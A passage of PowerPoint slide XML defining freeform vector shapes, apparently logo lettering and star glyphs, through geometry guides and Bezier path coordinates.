                <a:gd name="T25" fmla="*/ 0 h 90"/>
                <a:gd name="T26" fmla="*/ 65 w 104"/>
                <a:gd name="T27" fmla="*/ 33 h 90"/>
                <a:gd name="T28" fmla="*/ 54 w 104"/>
                <a:gd name="T29" fmla="*/ 42 h 90"/>
                <a:gd name="T30" fmla="*/ 43 w 104"/>
                <a:gd name="T31" fmla="*/ 42 h 90"/>
                <a:gd name="T32" fmla="*/ 50 w 104"/>
                <a:gd name="T33" fmla="*/ 15 h 90"/>
                <a:gd name="T34" fmla="*/ 62 w 104"/>
                <a:gd name="T35" fmla="*/ 15 h 90"/>
                <a:gd name="T36" fmla="*/ 67 w 104"/>
                <a:gd name="T37" fmla="*/ 24 h 90"/>
                <a:gd name="T38" fmla="*/ 65 w 104"/>
                <a:gd name="T39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90">
                  <a:moveTo>
                    <a:pt x="11" y="0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77" y="60"/>
                    <a:pt x="90" y="55"/>
                    <a:pt x="94" y="39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4" y="4"/>
                    <a:pt x="91" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="65" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="40"/>
                    <a:pt x="60" y="42"/>
                    <a:pt x="54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7" y="15"/>
                    <a:pt x="69" y="18"/>
                    <a:pt x="67" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65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7" name="Freeform 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C00BDCA-C373-4567-A647-1E56E21C5C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7075" y="1112838"/>
              <a:ext cx="65087" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 16 w 69"/>
                <a:gd name="T1" fmla="*/ 20 h 71"/>
                <a:gd name="T2" fmla="*/ 45 w 69"/>
                <a:gd name="T3" fmla="*/ 0 h 71"/>
                <a:gd name="T4" fmla="*/ 62 w 69"/>
                <a:gd name="T5" fmla="*/ 19 h 71"/>
                <a:gd name="T6" fmla="*/ 55 w 69"/>
                <a:gd name="T7" fmla="*/ 19 h 71"/>
                <a:gd name="T8" fmla="*/ 43 w 69"/>
                <a:gd name="T9" fmla="*/ 7 h 71"/>
                <a:gd name="T10" fmla="*/ 24 w 69"/>
                <a:gd name="T11" fmla="*/ 18 h 71"/>
                <a:gd name="T12" fmla="*/ 38 w 69"/>
                <a:gd name="T13" fmla="*/ 31 h 71"/>
                <a:gd name="T14" fmla="*/ 54 w 69"/>
                <a:gd name="T15" fmla="*/ 51 h 71"/>
                <a:gd name="T16" fmla="*/ 24 w 69"/>
                <a:gd name="T17" fmla="*/ 71 h 71"/>
                <a:gd name="T18" fmla="*/ 8 w 69"/>
                <a:gd name="T19" fmla="*/ 49 h 71"/>
                <a:gd name="T20" fmla="*/ 15 w 69"/>
                <a:gd name="T21" fmla="*/ 49 h 71"/>
                <a:gd name="T22" fmla="*/ 26 w 69"/>
                <a:gd name="T23" fmla="*/ 64 h 71"/>
                <a:gd name="T24" fmla="*/ 47 w 69"/>
                <a:gd name="T25" fmla="*/ 50 h 71"/>
                <a:gd name="T26" fmla="*/ 34 w 69"/>
                <a:gd name="T27" fmla="*/ 38 h 71"/>
                <a:gd name="T28" fmla="*/ 16 w 69"/>
                <a:gd name="T29" fmla="*/ 2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9" h="71">
                  <a:moveTo>
                    <a:pt x="16" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1"/>
                    <a:pt x="29" y="0"/>
                    <a:pt x="45" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="0"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="62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8" y="7"/>
                    <a:pt x="57" y="7"/>
                    <a:pt x="43" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="7"/>
                    <a:pt x="27" y="9"/>
                    <a:pt x="24" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="31"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="38" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="32"/>
                    <a:pt x="60" y="32"/>
                    <a:pt x="54" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="70"/>
                    <a:pt x="40" y="71"/>
                    <a:pt x="24" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="71"/>
                    <a:pt x="0" y="69"/>
                    <a:pt x="8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0" y="64"/>
                    <a:pt x="13" y="64"/>
                    <a:pt x="26" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="64"/>
                    <a:pt x="43" y="64"/>
                    <a:pt x="47" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="37"/>
                    <a:pt x="45" y="39"/>
                    <a:pt x="34" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="37"/>
                    <a:pt x="11" y="38"/>
                    <a:pt x="1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8" name="Freeform 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64F50867-1CC4-467E-A9A7-C0F413D52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9463" y="1112838"/>
              <a:ext cx="55562" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 35"/>
                <a:gd name="T1" fmla="*/ 19 h 42"/>
                <a:gd name="T2" fmla="*/ 30 w 35"/>
                <a:gd name="T3" fmla="*/ 19 h 42"/>
                <a:gd name="T4" fmla="*/ 29 w 35"/>
                <a:gd name="T5" fmla="*/ 22 h 42"/>
                <a:gd name="T6" fmla="*/ 10 w 35"/>
                <a:gd name="T7" fmla="*/ 22 h 42"/>
                <a:gd name="T8" fmla="*/ 5 w 35"/>
                <a:gd name="T9" fmla="*/ 38 h 42"/>
                <a:gd name="T10" fmla="*/ 25 w 35"/>
                <a:gd name="T11" fmla="*/ 38 h 42"/>
                <a:gd name="T12" fmla="*/ 24 w 35"/>
                <a:gd name="T13" fmla="*/ 42 h 42"/>
                <a:gd name="T14" fmla="*/ 0 w 35"/>
                <a:gd name="T15" fmla="*/ 42 h 42"/>
                <a:gd name="T16" fmla="*/ 11 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 42"/>
                <a:gd name="T18" fmla="*/ 35 w 35"/>
                <a:gd name="T19" fmla="*/ 0 h 42"/>
                <a:gd name="T20" fmla="*/ 34 w 35"/>
                <a:gd name="T21" fmla="*/ 4 h 42"/>
                <a:gd name="T22" fmla="*/ 14 w 35"/>
                <a:gd name="T23" fmla="*/ 4 h 42"/>
                <a:gd name="T24" fmla="*/ 11 w 35"/>
                <a:gd name="T25" fmla="*/ 1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42">
                  <a:moveTo>
                    <a:pt x="11" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11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79" name="Freeform 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F3F2A0E-363F-4316-94CC-E92A0F190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6300" y="1112838"/>
              <a:ext cx="65087" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 69 w 69"/>
                <a:gd name="T1" fmla="*/ 0 h 71"/>
                <a:gd name="T2" fmla="*/ 55 w 69"/>
                <a:gd name="T3" fmla="*/ 51 h 71"/>
                <a:gd name="T4" fmla="*/ 25 w 69"/>
                <a:gd name="T5" fmla="*/ 71 h 71"/>
                <a:gd name="T6" fmla="*/ 5 w 69"/>
                <a:gd name="T7" fmla="*/ 51 h 71"/>
                <a:gd name="T8" fmla="*/ 19 w 69"/>
                <a:gd name="T9" fmla="*/ 0 h 71"/>
                <a:gd name="T10" fmla="*/ 26 w 69"/>
                <a:gd name="T11" fmla="*/ 0 h 71"/>
                <a:gd name="T12" fmla="*/ 13 w 69"/>
                <a:gd name="T13" fmla="*/ 51 h 71"/>
                <a:gd name="T14" fmla="*/ 27 w 69"/>
                <a:gd name="T15" fmla="*/ 64 h 71"/>
                <a:gd name="T16" fmla="*/ 48 w 69"/>
                <a:gd name="T17" fmla="*/ 51 h 71"/>
                <a:gd name="T18" fmla="*/ 61 w 69"/>
                <a:gd name="T19" fmla="*/ 0 h 71"/>
                <a:gd name="T20" fmla="*/ 69 w 69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71">
                  <a:moveTo>
                    <a:pt x="69" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="51"/>
                    <a:pt x="55" y="51"/>
                    <a:pt x="55" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="70"/>
                    <a:pt x="40" y="71"/>
                    <a:pt x="25" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="71"/>
                    <a:pt x="0" y="71"/>
                    <a:pt x="5" y="5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0" y="62"/>
                    <a:pt x="12" y="64"/>
                    <a:pt x="27" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="64"/>
                    <a:pt x="45" y="62"/>
                    <a:pt x="48" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="0"/>
                    <a:pt x="61" y="0"/>
                    <a:pt x="61" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6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0" name="Freeform 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB425E83-51B2-4D41-83F7-E39D3393D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4250" y="1112838"/>
              <a:ext cx="23812" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 15"/>
                <a:gd name="T1" fmla="*/ 42 h 42"/>
                <a:gd name="T2" fmla="*/ 0 w 15"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 11 w 15"/>
                <a:gd name="T5" fmla="*/ 0 h 42"/>
                <a:gd name="T6" fmla="*/ 15 w 15"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 5 w 1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2">
                  <a:moveTo>
                    <a:pt x="5" y="42"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="42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1" name="Freeform 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9729C086-1E93-4A70-B05C-AD6A22E79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825" y="1112838"/>
              <a:ext cx="47625" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 30"/>
                <a:gd name="T1" fmla="*/ 42 h 42"/>
                <a:gd name="T2" fmla="*/ 3 w 30"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 12 w 30"/>
                <a:gd name="T5" fmla="*/ 4 h 42"/>
                <a:gd name="T6" fmla="*/ 0 w 30"/>
                <a:gd name="T7" fmla="*/ 4 h 42"/>
                <a:gd name="T8" fmla="*/ 1 w 30"/>
                <a:gd name="T9" fmla="*/ 0 h 42"/>
                <a:gd name="T10" fmla="*/ 30 w 30"/>
                <a:gd name="T11" fmla="*/ 0 h 42"/>
                <a:gd name="T12" fmla="*/ 29 w 30"/>
                <a:gd name="T13" fmla="*/ 4 h 42"/>
                <a:gd name="T14" fmla="*/ 17 w 30"/>
                <a:gd name="T15" fmla="*/ 4 h 42"/>
                <a:gd name="T16" fmla="*/ 7 w 30"/>
                <a:gd name="T1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42">
                  <a:moveTo>
                    <a:pt x="7" y="42"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7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2" name="Freeform 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1AB79C0-4F80-48A1-8915-7634F3611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8863" y="1112838"/>
              <a:ext cx="50800" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 13 w 32"/>
                <a:gd name="T1" fmla="*/ 25 h 42"/>
                <a:gd name="T2" fmla="*/ 8 w 32"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 4 w 32"/>
                <a:gd name="T5" fmla="*/ 42 h 42"/>
                <a:gd name="T6" fmla="*/ 9 w 32"/>
                <a:gd name="T7" fmla="*/ 25 h 42"/>
                <a:gd name="T8" fmla="*/ 0 w 32"/>
                <a:gd name="T9" fmla="*/ 0 h 42"/>
                <a:gd name="T10" fmla="*/ 6 w 32"/>
                <a:gd name="T11" fmla="*/ 0 h 42"/>
                <a:gd name="T12" fmla="*/ 12 w 32"/>
                <a:gd name="T13" fmla="*/ 20 h 42"/>
                <a:gd name="T14" fmla="*/ 28 w 32"/>
                <a:gd name="T15" fmla="*/ 0 h 42"/>
                <a:gd name="T16" fmla="*/ 32 w 32"/>
                <a:gd name="T17" fmla="*/ 0 h 42"/>
                <a:gd name="T18" fmla="*/ 13 w 32"/>
                <a:gd name="T19" fmla="*/ 2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42">
                  <a:moveTo>
                    <a:pt x="13" y="25"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="25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20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13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3" name="Freeform 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E743D2F-ADCF-4594-897F-738A5508AB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0" y="1112838"/>
              <a:ext cx="60325" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 44 w 63"/>
                <a:gd name="T1" fmla="*/ 52 h 71"/>
                <a:gd name="T2" fmla="*/ 27 w 63"/>
                <a:gd name="T3" fmla="*/ 64 h 71"/>
                <a:gd name="T4" fmla="*/ 19 w 63"/>
                <a:gd name="T5" fmla="*/ 64 h 71"/>
                <a:gd name="T6" fmla="*/ 12 w 63"/>
                <a:gd name="T7" fmla="*/ 40 h 71"/>
                <a:gd name="T8" fmla="*/ 18 w 63"/>
                <a:gd name="T9" fmla="*/ 21 h 71"/>
                <a:gd name="T10" fmla="*/ 41 w 63"/>
                <a:gd name="T11" fmla="*/ 7 h 71"/>
                <a:gd name="T12" fmla="*/ 45 w 63"/>
                <a:gd name="T13" fmla="*/ 7 h 71"/>
                <a:gd name="T14" fmla="*/ 53 w 63"/>
                <a:gd name="T15" fmla="*/ 19 h 71"/>
                <a:gd name="T16" fmla="*/ 60 w 63"/>
                <a:gd name="T17" fmla="*/ 19 h 71"/>
                <a:gd name="T18" fmla="*/ 53 w 63"/>
                <a:gd name="T19" fmla="*/ 0 h 71"/>
                <a:gd name="T20" fmla="*/ 42 w 63"/>
                <a:gd name="T21" fmla="*/ 0 h 71"/>
                <a:gd name="T22" fmla="*/ 10 w 63"/>
                <a:gd name="T23" fmla="*/ 22 h 71"/>
                <a:gd name="T24" fmla="*/ 3 w 63"/>
                <a:gd name="T25" fmla="*/ 49 h 71"/>
                <a:gd name="T26" fmla="*/ 16 w 63"/>
                <a:gd name="T27" fmla="*/ 71 h 71"/>
                <a:gd name="T28" fmla="*/ 25 w 63"/>
                <a:gd name="T29" fmla="*/ 71 h 71"/>
                <a:gd name="T30" fmla="*/ 51 w 63"/>
                <a:gd name="T31" fmla="*/ 53 h 71"/>
                <a:gd name="T32" fmla="*/ 53 w 63"/>
                <a:gd name="T33" fmla="*/ 48 h 71"/>
                <a:gd name="T34" fmla="*/ 46 w 63"/>
                <a:gd name="T35" fmla="*/ 48 h 71"/>
                <a:gd name="T36" fmla="*/ 44 w 63"/>
                <a:gd name="T37" fmla="*/ 5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" h="71">
                  <a:moveTo>
                    <a:pt x="44" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="62"/>
                    <a:pt x="38" y="64"/>
                    <a:pt x="27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7" y="64"/>
                    <a:pt x="9" y="56"/>
                    <a:pt x="12" y="4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21" y="9"/>
                    <a:pt x="26" y="7"/>
                    <a:pt x="41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54" y="7"/>
                    <a:pt x="55" y="10"/>
                    <a:pt x="53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3" y="7"/>
                    <a:pt x="59" y="2"/>
                    <a:pt x="53" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="42" y="0"/>
                    <a:pt x="42" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="0"/>
                    <a:pt x="15" y="2"/>
                    <a:pt x="10" y="22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0" y="63"/>
                    <a:pt x="5" y="71"/>
                    <a:pt x="16" y="71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38" y="71"/>
                    <a:pt x="47" y="69"/>
                    <a:pt x="51" y="53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46" y="48"/>
                    <a:pt x="46" y="48"/>
                    <a:pt x="46" y="48"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44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84" name="Freeform 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A2C4313-EA3D-4008-8AD3-F249AEC37B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51863" y="1112838"/>
              <a:ext cx="61912" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 48 w 66"/>
                <a:gd name="T1" fmla="*/ 0 h 70"/>
                <a:gd name="T2" fmla="*/ 48 w 66"/>
                <a:gd name="T3" fmla="*/ 0 h 70"/>
                <a:gd name="T4" fmla="*/ 19 w 66"/>
                <a:gd name="T5" fmla="*/ 0 h 70"/>
                <a:gd name="T6" fmla="*/ 0 w 66"/>
                <a:gd name="T7" fmla="*/ 70 h 70"/>
                <a:gd name="T8" fmla="*/ 7 w 66"/>
                <a:gd name="T9" fmla="*/ 70 h 70"/>
                <a:gd name="T10" fmla="*/ 15 w 66"/>
                <a:gd name="T11" fmla="*/ 42 h 70"/>
                <a:gd name="T12" fmla="*/ 38 w 66"/>
                <a:gd name="T13" fmla="*/ 42 h 70"/>
                <a:gd name="T14" fmla="*/ 45 w 66"/>
                <a:gd name="T15" fmla="*/ 55 h 70"/>
                <a:gd name="T16" fmla="*/ 41 w 66"/>
                <a:gd name="T17" fmla="*/ 70 h 70"/>
                <a:gd name="T18" fmla="*/ 48 w 66"/>
                <a:gd name="T19" fmla="*/ 70 h 70"/>
                <a:gd name="T20" fmla="*/ 53 w 66"/>
                <a:gd name="T21" fmla="*/ 51 h 70"/>
                <a:gd name="T22" fmla="*/ 46 w 66"/>
                <a:gd name="T23" fmla="*/ 39 h 70"/>
                <a:gd name="T24" fmla="*/ 46 w 66"/>
                <a:gd name="T25" fmla="*/ 39 h 70"/>
                <a:gd name="T26" fmla="*/ 62 w 66"/>
                <a:gd name="T27" fmla="*/ 21 h 70"/>
                <a:gd name="T28" fmla="*/ 62 w 66"/>
                <a:gd name="T29" fmla="*/ 21 h 70"/>
                <a:gd name="T30" fmla="*/ 62 w 66"/>
                <a:gd name="T31" fmla="*/ 20 h 70"/>
                <a:gd name="T32" fmla="*/ 62 w 66"/>
                <a:gd name="T33" fmla="*/ 20 h 70"/>
                <a:gd name="T34" fmla="*/ 62 w 66"/>
                <a:gd name="T35" fmla="*/ 20 h 70"/>
                <a:gd name="T36" fmla="*/ 62 w 66"/>
                <a:gd name="T37" fmla="*/ 20 h 70"/>
                <a:gd name="T38" fmla="*/ 48 w 66"/>
                <a:gd name="T39" fmla="*/ 0 h 70"/>
                <a:gd name="T40" fmla="*/ 39 w 66"/>
                <a:gd name="T41" fmla="*/ 35 h 70"/>
                <a:gd name="T42" fmla="*/ 17 w 66"/>
                <a:gd name="T43" fmla="*/ 35 h 70"/>
                <a:gd name="T44" fmla="*/ 24 w 66"/>
                <a:gd name="T45" fmla="*/ 7 h 70"/>
                <a:gd name="T46" fmla="*/ 46 w 66"/>
                <a:gd name="T47" fmla="*/ 7 h 70"/>
                <a:gd name="T48" fmla="*/ 56 w 66"/>
                <a:gd name="T49" fmla="*/ 10 h 70"/>
                <a:gd name="T50" fmla="*/ 55 w 66"/>
                <a:gd name="T51" fmla="*/ 19 h 70"/>
                <a:gd name="T52" fmla="*/ 39 w 66"/>
                <a:gd name="T53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" h="70"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6" y="42"/>
                    <a:pt x="47" y="46"/>
                    <a:pt x="45" y="55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55" y="44"/>
                    <a:pt x="53" y="39"/>
                    <a:pt x="46" y="3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56" y="37"/>
                    <a:pt x="59" y="30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6" y="4"/>
                    <a:pt x="61" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="39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52" y="7"/>
                    <a:pt x="55" y="8"/>
                    <a:pt x="56" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="12"/>
                    <a:pt x="56" y="15"/>
                    <a:pt x="55" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="31"/>
                    <a:pt x="50" y="35"/>
                    <a:pt x="39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3DB0265-BA6E-944E-A0E2-D9FECA4A3141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="353289" y="300242"/>
            <a:ext cx="2539202" cy="434997"/>
            <a:chOff x="353289" y="300242"/>
            <a:chExt cx="2539202" cy="434997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Freeform 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09610BD8-E138-4C47-B157-77093E527F51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="353289" y="300242"/>
              <a:ext cx="341498" cy="434997"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 240715 w 341498"/>
                <a:gd name="connsiteY0" fmla="*/ 329512 h 434997"/>
                <a:gd name="connsiteX1" fmla="*/ 240715 w 341498"/>
                <a:gd name="connsiteY1" fmla="*/ 339886 h 434997"/>
                <a:gd name="connsiteX2" fmla="*/ 250139 w 341498"/>
                <a:gd name="connsiteY2" fmla="*/ 339886 h 434997"/>
                <a:gd name="connsiteX3" fmla="*/ 255956 w 341498"/>
                <a:gd name="connsiteY3" fmla="*/ 334582 h 434997"/>
                <a:gd name="connsiteX4" fmla="*/ 250139 w 341498"/>
                <a:gd name="connsiteY4" fmla="*/ 329512 h 434997"/>
                <a:gd name="connsiteX5" fmla="*/ 307438 w 341498"/>
                <a:gd name="connsiteY5" fmla="*/ 328113 h 434997"/>
                <a:gd name="connsiteX6" fmla="*/ 311277 w 341498"/>
                <a:gd name="connsiteY6" fmla="*/ 337496 h 434997"/>
                <a:gd name="connsiteX7" fmla="*/ 321370 w 341498"/>
                <a:gd name="connsiteY7" fmla="*/ 338254 h 434997"/>
                <a:gd name="connsiteX8" fmla="*/ 313662 w 341498"/>
                <a:gd name="connsiteY8" fmla="*/ 344810 h 434997"/>
                <a:gd name="connsiteX9" fmla="*/ 316047 w 341498"/>
                <a:gd name="connsiteY9" fmla="*/ 354660 h 434997"/>
                <a:gd name="connsiteX10" fmla="*/ 307438 w 341498"/>
                <a:gd name="connsiteY10" fmla="*/ 349327 h 434997"/>
                <a:gd name="connsiteX11" fmla="*/ 298829 w 341498"/>
                <a:gd name="connsiteY11" fmla="*/ 354660 h 434997"/>
                <a:gd name="connsiteX12" fmla="*/ 301243 w 341498"/>
                <a:gd name="connsiteY12" fmla="*/ 344810 h 434997"/>
                <a:gd name="connsiteX13" fmla="*/ 293535 w 341498"/>
                <a:gd name="connsiteY13" fmla="*/ 338254 h 434997"/>
                <a:gd name="connsiteX14" fmla="*/ 303599 w 341498"/>
                <a:gd name="connsiteY14" fmla="*/ 337496 h 434997"/>
                <a:gd name="connsiteX15" fmla="*/ 34030 w 341498"/>
                <a:gd name="connsiteY15" fmla="*/ 328113 h 434997"/>
                <a:gd name="connsiteX16" fmla="*/ 37869 w 341498"/>
                <a:gd name="connsiteY16" fmla="*/ 337496 h 434997"/>
                <a:gd name="connsiteX17" fmla="*/ 47962 w 341498"/>
                <a:gd name="connsiteY17" fmla="*/ 338254 h 434997"/>
                <a:gd name="connsiteX18" fmla="*/ 40254 w 341498"/>
                <a:gd name="connsiteY18" fmla="*/ 344810 h 434997"/>
                <a:gd name="connsiteX19" fmla="*/ 42639 w 341498"/>
                <a:gd name="connsiteY19" fmla="*/ 354660 h 434997"/>
                <a:gd name="connsiteX20" fmla="*/ 34030 w 341498"/>
                <a:gd name="connsiteY20" fmla="*/ 349327 h 434997"/>
                <a:gd name="connsiteX21" fmla="*/ 25421 w 341498"/>
                <a:gd name="connsiteY21" fmla="*/ 354660 h 434997"/>
                <a:gd name="connsiteX22" fmla="*/ 27806 w 341498"/>
                <a:gd name="connsiteY22" fmla="*/ 344810 h 434997"/>
                <a:gd name="connsiteX23" fmla="*/ 20098 w 341498"/>
                <a:gd name="connsiteY23" fmla="*/ 338254 h 434997"/>
                <a:gd name="connsiteX24" fmla="*/ 30191 w 341498"/>
                <a:gd name="connsiteY24" fmla="*/ 337496 h 434997"/>
                <a:gd name="connsiteX25" fmla="*/ 234898 w 341498"/>
                <a:gd name="connsiteY25" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX26" fmla="*/ 250808 w 341498"/>
                <a:gd name="connsiteY26" fmla="*/ 324762 h 434997"/>
                <a:gd name="connsiteX27" fmla="*/ 261773 w 341498"/>
                <a:gd name="connsiteY27" fmla="*/ 333766 h 434997"/>
                <a:gd name="connsiteX28" fmla="*/ 256218 w 341498"/>
                <a:gd name="connsiteY28" fmla="*/ 342188 h 434997"/>
                <a:gd name="connsiteX29" fmla="*/ 261163 w 341498"/>
                <a:gd name="connsiteY29" fmla="*/ 349211 h 434997"/>
                <a:gd name="connsiteX30" fmla="*/ 262966 w 341498"/>
                <a:gd name="connsiteY30" fmla="*/ 357953 h 434997"/>
                <a:gd name="connsiteX31" fmla="*/ 256741 w 341498"/>
                <a:gd name="connsiteY31" fmla="*/ 357953 h 434997"/>
                <a:gd name="connsiteX32" fmla="*/ 255869 w 341498"/>
                <a:gd name="connsiteY32" fmla="*/ 353057 h 434997"/>
                <a:gd name="connsiteX33" fmla="*/ 249266 w 341498"/>
                <a:gd name="connsiteY33" fmla="*/ 344315 h 434997"/>
                <a:gd name="connsiteX34" fmla="*/ 240715 w 341498"/>
                <a:gd name="connsiteY34" fmla="*/ 344315 h 434997"/>
                <a:gd name="connsiteX35" fmla="*/ 240715 w 341498"/>
                <a:gd name="connsiteY35" fmla="*/ 358011 h 434997"/>
                <a:gd name="connsiteX36" fmla="*/ 234898 w 341498"/>
                <a:gd name="connsiteY36" fmla="*/ 358011 h 434997"/>
